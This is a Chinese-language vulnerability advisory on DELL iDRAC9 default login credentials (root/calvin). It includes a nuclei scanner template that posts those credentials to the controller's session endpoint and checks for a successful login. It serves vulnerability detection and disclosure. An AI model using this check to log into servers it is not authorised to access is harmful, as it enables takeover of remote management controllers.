DELL iDRAC9 默认登录凭证漏洞

漏洞信息

漏洞名称: DELL iDRAC9 默认登录凭证漏洞

漏洞类型: 弱口令

漏洞等级: 高危

漏洞描述: DELL iDRAC9是戴尔公司推出的一款远程访问控制器,主要用于服务器的远程管理,包括监控系统健康、配置硬件设置和执行维护任务等。它广泛应用于企业级服务器管理中,是数据中心和IT基础设施的重要组成部分。该产品被发现存在默认登录凭证漏洞,攻击者可以利用这些默认凭证未经授权访问系统。

漏洞的根源在于DELL iDRAC9系统在出厂时预设了默认的用户名和密码(用户名:root,密码:calvin),而许多用户在部署后未能及时更改这些默认凭证。这种弱口令问题属于CWE-798类漏洞,即使用硬编码凭证。攻击者可以通过简单的暴力破解或直接尝试这些默认凭证,轻易获得系统的访问权限。

此漏洞的安全风险极高,因为一旦攻击者利用默认凭证登录系统,他们可以执行任意命令、访问敏感数据、修改系统配置,甚至完全控制受影响的服务器。由于iDRAC9通常用于管理关键服务器,这种未授权访问可能导致严重的数据泄露、服务中断或其他恶意活动。值得注意的是,利用此漏洞无需任何前置条件或认证,攻击者可以自动化地进行攻击尝试,使得漏洞的利用门槛极低,危害性极大。

产品厂商: DELL

产品名称: DELL iDRAC9

来源: https://github.com/projectdiscovery/nuclei-templates/blob/209157c2ffc6387f4b43acc176a988af5ec6a870/http%2Fdefault-logins%2Fdell%2Fdell-idrac9-default-login.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

id: dell-idrac9-default-login

info:
name: DELL iDRAC9 - Default Login
author: kophjager007,milo2012
severity: high
description: DELL iDRAC9 default login credentials were discovered.
reference:
- https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
classification:
cwe-id: cwe-798
metadata:
max-request: 1
tags: dell,idrac,default-login

http:
- raw:
- |
POST /sysmgmt/2015/bmc/session HTTP/1.1
Host: {{Hostname}}
User: "{{username}}"
Password: "{{password}}"

payloads:
username:
- root
password:
- calvin
attack: pitchfork

matchers-condition: and
matchers:
- type: status
status:
- 201
- 200
condition: or

- type: regex
name: authresult
regex:
- '"authResult"\s*:\s*0'